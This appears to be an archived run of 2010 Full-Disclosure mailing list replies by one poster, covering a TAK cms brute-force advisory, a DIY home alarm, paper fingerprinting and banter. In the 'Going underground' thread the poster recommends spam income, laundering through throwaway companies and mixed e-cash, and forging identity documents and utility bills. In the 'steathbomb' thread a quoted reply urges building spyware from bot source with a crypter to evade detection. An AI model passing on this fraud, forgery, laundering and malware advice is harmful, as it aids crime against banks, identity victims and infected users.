>> Hosted and sponsored by Secunia - http://secunia.com/
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in TAK cms

[T Biehn]

If there were an account lockout after 5 tries would you be telling us
about how there was a DOS vector on the same software?

-Travis

On Mon, Apr 5, 2010 at 4:35 PM, MustLive  wrote:
> Hello Full-Disclosure!
>
> I want to warn you about security vulnerabilities in TAK cms. It's Ukrainian
> commercial CMS.
>
> -
> Advisory: Vulnerabilities in TAK cms
> -
> URL: http://websecurity.com.ua/4050/
> -
> Timeline:
> 04.02.2009 - found vulnerabilities.
> 30.09.2009 - informed owners of web sites where I found these
> vulnerabilities. Taking into account, that I didn't find any contact data of
> developer of TAK cms, then I hope, that owners of that site informed him
> about these vulnerabilities. This is one of those cases with commercial CMS,
> where developers didn't leave any contact data and there is no information
> about them in Internet.
> 19.03.2010 - disclosed at my site.
> -
> Details:
>
> These are Insufficient Anti-automation and Brute Force vulnerabilities.
>
> Insufficient Anti-automation:
>
> http://site/about/contacts/
> http://site/register/getpassword/
>
> At these pages there is not protection from automated requests (captcha).
>
> Brute Force:
>
> http://site/auth/
> http://site/admin/
>
> In login forms there is no protection from Brute Force attacks.
>
> Vulnerable are all versions of TAK cms.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Security system

[T Biehn]

Can't hurt.
I don't trust machines in DCs much less VPSs.

An adversary with the resources and motivation to kill power, net, and
jam GSM when they're pwning your house would probably be able to know
about and take out your watchdog box in the same move.

-Travis

On Fri, Apr 2, 2010 at 9:46 AM, Haris Pilton  wrote:
> On Tuesday, March 30, 2010, T Biehn  wrote:
>> Nah, I'm saying a GSM jammer would block your prepaid cell signal.
>>
>> So if your adversary were to cut the power, cut the net AND jam GSM
>> you'd be out of luck in getting notification.
>
> Very tru, tho u can combine this with a remote box that reacts iff it
> no longer cant reach ur home box. Tht wy they cant just block outgoing
> signals n be clear
>
>>
>> You can get all fancy and have your program try all methods available.
>> Cell, Wired Net, WIFI (throw an antennae on your roof,) pager, etc.
>>
>> -Travis
>>
>> On Tue, Mar 30, 2010 at 10:39 AM,   wrote:
>>> Good idea u saying also I should by a gsm jammer this a good idea I will
>>> try.
>>>
>>> Sent from my iPhone
>>>
>>> On Mar 30, 2010, at 11:30 AM, T Biehn  wrote:
>>>
>>>> Buy a prepaid cell, rig your comp & phone up to a battery backup.
>>>> Breakout board on your Serial port, or from a USB-DB9 RS232 adapter.
>>>>
>>>> Have the text messaged banged out on the prepaid, rig wires from the
>>>> breakout board to the cell phone, rig wires from your security sensors
>>>> into your breakout board. App to listen on com port send a nice high
>>>> signal to the pin connecting to your send key.
>>>>
>>>> Done.
>>>>
>>>> Like, 50$ for the phone incld. minutes.
>>>> Like less than 20$ for a breakout board.
>>>>
>>>> Also, rig the ringer up to an input on the breakout board and you can
>>>> call your phone to clear your FDE keys from RAM and kill your machine
>>>> if you think the man is paying a visit once you get a text :)
>>>>
>>>> Some adversaries will cut net, hardline, sometimes power.
>>>>
>>>> Attacks: GSM jammers, which everyone has.
>>>>
>>>> -Travis
>>>>
>>>> On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar  wrote:
>>>>>
>>>>> Try arduino + internet.
>>>>>
>>>>> 2010/3/27 
>>>>>>
>>>>>> Any one got any ides how I would program a system to call me from a
>>>>>> voip network to alert me of a home security breach.
>>>>>>
>>>>>> Sent from my iPhone
>>>>>>
>>>>>> ___
>>>>>> Full-Disclosure - We believe in it.
>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>
>>>>>
>>>>> ___
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>>>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>>>> http://pastebin.com/f6fd606da
>>>
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] StreamArmor v1.0 has Released!!!

[T Biehn]

HELLO AND THANK YOU FOR YOUR NOTICE I WILL QUICKLY DOWNLOAD THESE
APPLICATIONS AND ERADICATE MY EVIL STREAMS.

On Sun, Mar 28, 2010 at 10:15 PM, evil fingers
 wrote:
> StreamArmor is the sophisticated tool for discovering hidden alternate data
> streams (ADS) as well as clean them completely from the system. It's
> advanced auto analysis coupled with online threat verification mechanism
> makes it the best tool available in the market for eradicating the evil
> streams. StreamArmor comes with fast multi threaded ADS scanner which can
> recursively scan over entire system and quickly uncover all hidden streams.
> All such discovered streams are represented using specific color patten
> based on threat level which makes it easy for human eye to distinguish
> between suspicious and normal streams.
>
> StreamArmor has built-in advanced file type detection mechanism which
> examines the content of file to accurately detect the file type of stream.
> This makes it great tool in forensic analysis in uncovering hidden
> documents/images/audio/video/database/archive files within the alternate
> data streams. StreamArmor is the standalone, portable application which does
> not require any installation. It can be copied to any place in the system
> and executed directly.
>
> To Read more & to Download the tool, check out : http://www.StreamArmor.com
>
> What others think about SecurityArmor v1.0?
> http://www.security-database.com/toolswatch/StreamArmor-v1-the-advanced.html
>
> Thank you for choosing Rootkit Analytics!
>
> Kind Regards,
> EF
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Security system

[T Biehn]

Nah, I'm saying a GSM jammer would block your prepaid cell signal.

So if your adversary were to cut the power, cut the net AND jam GSM
you'd be out of luck in getting notification.

You can get all fancy and have your program try all methods available.
Cell, Wired Net, WIFI (throw an antennae on your roof,) pager, etc.

-Travis

On Tue, Mar 30, 2010 at 10:39 AM,   wrote:
> Good idea u saying also I should by a gsm jammer this a good idea I will
> try.
>
> Sent from my iPhone
>
> On Mar 30, 2010, at 11:30 AM, T Biehn  wrote:
>
>> Buy a prepaid cell, rig your comp & phone up to a battery backup.
>> Breakout board on your Serial port, or from a USB-DB9 RS232 adapter.
>>
>> Have the text messaged banged out on the prepaid, rig wires from the
>> breakout board to the cell phone, rig wires from your security sensors
>> into your breakout board. App to listen on com port send a nice high
>> signal to the pin connecting to your send key.
>>
>> Done.
>>
>> Like, 50$ for the phone incld. minutes.
>> Like less than 20$ for a breakout board.
>>
>> Also, rig the ringer up to an input on the breakout board and you can
>> call your phone to clear your FDE keys from RAM and kill your machine
>> if you think the man is paying a visit once you get a text :)
>>
>> Some adversaries will cut net, hardline, sometimes power.
>>
>> Attacks: GSM jammers, which everyone has.
>>
>> -Travis
>>
>> On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar  wrote:
>>>
>>> Try arduino + internet.
>>>
>>> 2010/3/27 
>>>>
>>>> Any one got any ides how I would program a system to call me from a
>>>> voip network to alert me of a home security breach.
>>>>
>>>> Sent from my iPhone
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Security system

[T Biehn]

Buy a prepaid cell, rig your comp & phone up to a battery backup.
Breakout board on your Serial port, or from a USB-DB9 RS232 adapter.

Have the text messaged banged out on the prepaid, rig wires from the
breakout board to the cell phone, rig wires from your security sensors
into your breakout board. App to listen on com port send a nice high
signal to the pin connecting to your send key.

Done.

Like, 50$ for the phone incld. minutes.
Like less than 20$ for a breakout board.

Also, rig the ringer up to an input on the breakout board and you can
call your phone to clear your FDE keys from RAM and kill your machine
if you think the man is paying a visit once you get a text :)

Some adversaries will cut net, hardline, sometimes power.

Attacks: GSM jammers, which everyone has.

-Travis

On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar  wrote:
> Try arduino + internet.
>
> 2010/3/27 
>>
>> Any one got any ides how I would program a system to call me from a
>> voip network to alert me of a home security breach.
>>
>> Sent from my iPhone
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Administrivia: An Experiment

[T Biehn]

This will cause segmentation of the 'moderate trolling list' market.

I am impressed at your trolling prowess John, you're a natural.

-Travis

On Wed, Mar 24, 2010 at 2:17 PM, Paul Schmehl  wrote:
> --On Wednesday, March 24, 2010 15:33:54 + John Cartwright
>  wrote:
>
>> Hi
>>
>> After some deliberation I have decided to try an experiment.  Until
>> further notice, new list members will be subject to temporary
>> moderation.
>>
>
> Cue the obligatory "the world is coming to an end, fd will never be the same,
> this is a violation of the spirit of fd" whining tape..  :-)
>
> --
> Paul Schmehl, Senior Infosec Analyst
> As if it wasn't already obvious, my opinions
> are my own and not those of my employer.
> ***
> "It is as useless to argue with those who have
> renounced the use of reason as to administer
> medication to the dead." Thomas Jefferson
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fingerprinting Paper with Laser

[T Biehn]

What 'limits'? What 'acceptable range' are you talking about?
I think they scan the surface doing pit depth / pit counts like an expensive
cd reader.
Within this presumption, you have to fingerprint either the whole document
or a small square. It cannot be duplicated, it cannot be used to
authenticate 'batches.' It could only be included in some piggyback data
e.g. in the smartcard. Preferrably signed. With some glorious pki.

Keep trying,

-Travis

On Mar 19, 2010 7:20 PM, "mrx"  wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

valdis.kletni...@vt.edu wrote:

> On Fri, 19 Mar 2010 20:51:40 -, mrx said:
>> Consider a production line for printing anything ...
If deviations in the manufacturing process were consistently between known
limits, it still serves as a control.
A hacker may learn those limits but then the problem of recreating an equal
manufacturing process still remains.
Obviously if the deviation in each sample is such that the known level of
consistency is so wide that the process is easily
replicated then the tech is useless as an indicator of integrity.


> A bigger concern is whether normal wear and tear will invalidate the
> measurements - some spots ...
Yes I would agree, but for tokens of limited lifetime perhaps there is still
potential.
Concert tickets, travel tickets etc.
Besides one could always force renewal of the token once it's valid lifetime
has expired.

I still think there may be a potential security benefit here.

mrx


- --
Mankind's systems are white sticks tapping walls.
Thanks Roy
http://www.propergander.org.uk
--...
iQEVAwUBS6QExrIvn8UFHWSmAQJnygf/dUiVo37byk9WFfk1PTigC/ZJNYxr7iuB
JZ9Pv/H2d0YI8M/ru54B5Q6rO7RFqDDRJhlgAjLLOY6R1p2D9ai6NvM+yJWfI5eb
gtqOLaV6s4KSY2pl40CYXm26cVOmascglyFOdwSdH76Lu8EERqI7woKra6PNBXv2
1olRAcNr8qmYY6DxBDJPZ1Q3J6/FtGIkMHjh1eg3ysoGtgfPk3TQnusgjqgY5Omp
6MG1Q4wPosVCRAH3igvkR8zRLFpkCgBlHsoV/qvK+poPf4o2h5UNqXIK7jVLrz70
RQmZIH+GrWlXjSS1VLYYf+OHe1W0gRirruS2otj14WqfLvyLrKl3iQ==
=TlBw

-END PGP SIGNATURE-

___
Full-Disclosure - We be...
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fingerprinting Paper with Laser

[T Biehn]

X,
The point is that material isn't consistent.

Duh.

-Travis

On Mar 19, 2010 4:58 PM, "mrx"  wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Consider a production line for printing anything that...
sample of the material printed/magnetised or otherwise marked during a
production run, then only one token need be scanned by laser. This

single data set can then be used by access points to verify the validity of
said token(s) when prese...

> So your proposition is that the passport manufacturers all use laser
> beams on each passport they...

- --
Mankind's systems are white sticks tapping walls.
Thanks Roy
http://www.propergander.org.uk
---...
iQEVAwUBS6Pj3LIvn8UFHWSmAQI+WQgArwfPjlBMHIxCz5Muag5zO9wAbkQTekk1
LUHjDuV3pXn9TXNWFKoydaYaj6jWafpXFt58BTZLqn8ZgSIcMw+cip2ZNdC7WOQ6
x37ESSboLLfRnRwKVYpPTz7H8yzKNWcEu7nY3fnrO337Tdm8N5hTkgt5KAhq0qRg
XM/uOYicd1suk1jEx4gJ4mBXLG59+7baqyT6wnjBRYTfpbeOWdWLpHIKYBmEWoYC
CjAphrBvlnWNPEKsQHjS+nFXG7sSaEO6lg88W/Ka4Kt268Hkzl8pYtvwye9U+lFS
H7S0GrZR+Vgvrq9+419QwzH3oBbpdEq6tKkvcD74HXlhGB20EJayfA==
=KDgR
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http:/...
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fingerprinting Paper with Laser

[T Biehn]

Excellent point.

Travis

On Fri, Mar 19, 2010 at 12:24 PM, james o' hare
 wrote:
> On Thu, Mar 18, 2010 at 6:42 PM, Fetch, Brandon  wrote:
>> But wait!  That "paper fingerprint" can be captured and added to the RFID 
>> data already saved!
>>
>> *tongue firmly in cheek*
>>
>> No one would be devious enough to duplicate or forge "secured" RFID data in 
>> our passports now would they?
>
> I'm sure The Mossad will try and bypass our technologies.
>
> Andrew
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fingerprinting Paper with Laser

[T Biehn]

So your proposition is that the passport manufacturers all use laser
beams on each passport they create and that this whitelist be somehow
distributed to each and every airport and border check-point?

lol.

How bout we just let them get PKI right first.

-Travis

On Thu, Mar 18, 2010 at 12:03 PM, james o' hare
 wrote:
> On Thu, Mar 18, 2010 at 3:36 PM, T Biehn  wrote:
>> Ridiculous.
>> Generate some valid, non-far-fetched use-cases to justify this if I'm wrong.
>>
>>> The Mossad going to Dubai and assassinating people
>>> in hotel rooms, then I'm all for it.
>>>
>
> They used false British passports, and you wonder why we want to have
> these technologies?
>
> Andrew
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fingerprinting Paper with Laser

[T Biehn]

Ridiculous.
Generate some valid, non-far-fetched use-cases to justify this if I'm wrong.

-Travis

On Thu, Mar 18, 2010 at 11:21 AM, james o' hare
 wrote:
> On Thu, Mar 18, 2010 at 3:17 PM, Gadi Evron  wrote:
>> I saw this release today, and just had to share it with anyone I could find.
>>
>> "Every paper, plastic, metal and ceramic surface is microscopically
>> different and has its own 'fingerprint'. Professor Cowburn's LSA system
>> uses a laser to read this naturally occurring 'fingerprint'. The
>> accuracy of measurement is often greater than that of DNA with a
>> reliability of at least one million trillion."
>>
>> I love it when old technologies and science are used in interesting new
>> ways to impact the future.
>>
>> http://nanotechwire.com/news.asp?nid=2254
>>
>> Expect to see this technology at an airport near you, in five years or so.
>>
>>        Gadi.
>
> As long as it stops The Mossad going to Dubai and assassinating people
> in hotel rooms, then I'm all for it.
>
> Andrew
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I have been threatened.

[T Biehn]

I've heard about these ninjas, the only way to escape their powers is
a ten-strip to your face.

On Tue, Mar 2, 2010 at 11:19 AM, Benji  wrote:
> If Yahoo has ninjas, what does Google have ?! @#!
>
> Sent from my iPhone
> On 2 Mar 2010, at 16:08, James Rankin  wrote:
>
> Mini Ninjas!
>
> On 2 March 2010 16:06,  wrote:
>>
>> On Tue, 02 Mar 2010 09:01:59 EST, "Kain, Becki (B.)" said:
>> >  Yahoo.com has assassins?  Wow!
>>
>> Not just assassins.  Super secret ninja assassins that nobody else can
>> see. ;)
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> --
> "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
> the machine wrong figures, will the right answers come out?' I am not able
> rightly to apprehend the kind of confusion of ideas that could provoke such
> a question."
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Going "underground", living out of backpack, etc?

[T Biehn]

Simon: What you need is a constant source of income. I suggest you
study TAO Spam (more than just inboxing, mind you.)
You will need an anonymous corporation for fund intake. You will want
a business bank account. You will want to transfer the funds that come
into your account into electronic cash. You will want to mix this cash
about. You will want to lose and create these companies often.

Expect to take a 35% (conservative figure) hit on all profit for
exchange services.

Be sure to know your way around high quality printing and photoshop.
Have a large database of Water & Electric bills. Invest in a
lamination machine. Invest in a magstrip writer & logger, invest in a
smartcard season logger/reader/writer. Learn how to solder. Learn how
to do fast-low cost fabrication.

Acquaint yourself with prepaid visa gift cards and e-cash debit cards.
Acquaint yourself with online (re-)mailing services.
Dispose of all digital equipment you already own and buy new kit with
prepaid visa gift cards or cash.  Perform activations at wifi spots,
don't make the mistake of being in the view of security cameras.
Remove their batteries. Relocate and disappear.

Do not contact friends and family. If you operate online do not use a
constant pseudonym.

-Travis

On Mon, Mar 1, 2010 at 2:21 AM, Christian Sciberras  wrote:
> Start by not touching any kind of digital device. You wouldn't know how many
> chinese have put tracking/spy bugs inside them. Or how many modified NSA
> backdoors, for the matter.
> Using a PC probably increases risk by 1000%.
>
>
>
>
> On Mon, Mar 1, 2010 at 5:49 AM, Simon Garfinkle  wrote:
>>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> Hello.
>>
>> I am interested in getting some advice from you security
>> professionals (white hat and black hat) about going underground.
>>
>> I am sick of big brother, I love independence, I was to experience
>> the world and have no commitments.
>>
>> I am just sick of being held down in one place. It's too easy for
>> people to harass and stalk you.  You gotta be mobile. Fancy free
>> and foot loose.
>>
>> You gotta be underground.
>>
>> Have any advice for living out of a bag? Any stories? Any lessons?
>>
>> -BEGIN PGP SIGNATURE-
>> Charset: UTF8
>> Note: This signature can be verified at https://www.hushtools.com/verify
>> Version: Hush 3.0
>>
>> wpwEAQMCAAYFAkuLR3UACgkQRQnwIcxK0rKdJwP9Fbv4ENsN+ouzbn34owsypykpL00+
>> E1qCZBwZGD4EJ5QK6PKdyR3kc33hOOasqaWn+HQVX1OtdKa/bXwWCJw3b3bEbImPHHoM
>> FSfO7mJsrifYsufZcXtgRgFOI3KA7W+cN1DHncawcBf5/7CNKrjXSVi2NewLsp7beFlM
>> gJrMvYw=
>> =ii33
>> -END PGP SIGNATURE-
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: steathbomb

[T Biehn]

Alzo see: USB DMA.

On Fri, Feb 26, 2010 at 8:29 AM, McGhee, Eddie  wrote:
> Its simply using USB autorun to launch and install itself, not sure how much 
> it is picked up but tbh you could build one yourself possibly with the 
> features you need, just look into getting some decent bot source and go from 
> there, would save the 130 dollars imo.
>
> Plenty source code out there to make one these, in fact, I think I will make 
> a guide on it if I get around to it with a stripped down bot, the only thing 
> you really need to worry about is detection, if you have the know how build 
> yourself a decent crypter and make sure no one gets a hold of it to keep 
> detections down.
>
> phed
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of RandallM
> Sent: 26 February 2010 12:36
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] Fwd: steathbomb
>
> anyone see this and know about it? How it works and good detection?
>
> http://www.brickhousesecurity.com/pc-computer-spy.html
>
> --
> been great, thanks
> RandyM
> a.k.a System
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Why

[T Biehn]

Kafka's The *Trial. My sincere apologies.

On Mon, Feb 22, 2010 at 12:51 PM, T Biehn  wrote:
> Jonathan,
> There are a few things you can do if the target of a government
> investigation. First and foremost you must acquaint yourself with the
> preeminent guide to the infinite investigative journeys: Kafka's The
> Trail. If you are lacking in literary concentration Orson Welles
> directed a very excellent screenplay version of the novel.
>
> The best recommendation I can afford is to leave the country. If your
> life has been ruined and your friends and family have been badgered
> you have nothing to lose. Your personal and professional lives are
> nil. Restart in a new country.
>
> The second best recommendation is to adopt the 24/7 surveillance as a
> sort of warm big-brother security blanket, intentionally insert
> yourself in dangerous situations, the men who are watching you are
> bound by law to intercede to save your life. Tell people that you're
> being watched, make sure you have proof of surveillance so they don't
> think you're crazy. Let them know that it's a farce, you've done
> nothing wrong. You might find that you can attract certain types of
> women by sharing your unique problem with them, I'd suggest you start
> with the Yoga, new age groups full of bored household wives at your
> local gym.
>
>
> On Fri, Feb 19, 2010 at 6:34 PM, Christian Sciberras  
> wrote:
>> @Jonny - No, I meant that you should write books. My mistake. Obviously.
>>
>>
>>
>>
>>
>>
>> On Fri, Feb 19, 2010 at 11:26 PM, Benji  wrote:
>>> Where should I send the cheque so that the funds may be released?
>>>
>>> On Fri, Feb 19, 2010 at 10:24 PM, Jonathan Barningham 
>>> wrote:
>>>>
>>>> -BEGIN PGP SIGNED MESSAGE-
>>>> Hash: SHA1
>>>>
>>>> man
>>>>
>>>> someone please help me
>>>>
>>>> On Fri, 19 Feb 2010 22:08:43 + Jonathan Barningham
>>>>  wrote:
>>>> >I mean to say, my life is being vivisected. They are pulling my
>>>> >life apart in layers like string cheese.
>>>> >
>>>> >It's quite uncomfortable.
>>>> >
>>>> >On Fri, 19 Feb 2010 21:57:52 + "Thor (Hammer of God)"
>>>> > wrote:
>>>> >>Vivisected like string cheese?
>>>> >>
>>>> >>> -Original Message-
>>>> >>> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
>>>> >>> disclosure-boun...@lists.grok.org.uk] On Behalf Of Jonathan
>>>> >>Barningham
>>>> >>> Sent: Friday, February 19, 2010 1:51 PM
>>>> >>> To: full-disclosure@lists.grok.org.uk
>>>> >>> Subject: Re: [Full-disclosure] Why
>>>> >>>
>>>> >>> -BEGIN PGP SIGNED MESSAGE-
>>>> >>> Hash: SHA1
>>>> >>>
>>>> >>> Hello.
>>>> >>>
>>>> >>> I used to be online friends with a subject of an FBI
>>>> >>investigation.
>>>> >>>
>>>> >>> (Not saying who for my safety)
>>>> >>>
>>>> >>> I suppose I could be of assistance in his arrest and
>>>> >>prosecution,
>>>> >>> however, they didn't approach me that way. They approached me
>>>> >>years
>>>> >>> after I changed my life, in a very heavy handed way. Steven
>>>> >>Hatfill
>>>> >>> like, but with local cops. (Clearly, I'm being ambiguous to
>>>> >>protect
>>>> >>> my anonymity)
>>>> >>>
>>>> >>> Add a little ambiguity and locals with hitlists against me from
>>>> >>my
>>>> >>> younger years, That's all it takes. In truth it's not just MIB,
>>>> >>> it's local police back where I used to live.
>>>> >>>
>>>> >>> I'm not going to be arrested obviously, but the constant
>>>> >>bullying,
>>>> >>> harassment, surveillance, pretexts and entrapment attempts is
>>>> >>mind-
>>>> >>> numbing and painful. I'm not some bad guy. I feel so deeply
>>>> >>hurt.
>>>> >>>
>>>> >>> FBI? Stories in specific? A provocateur sent to paint m

Re: [Full-disclosure] Why

[T Biehn]

Jonathan,
There are a few things you can do if the target of a government
investigation. First and foremost you must acquaint yourself with the
preeminent guide to the infinite investigative journeys: Kafka's The
Trail. If you are lacking in literary concentration Orson Welles
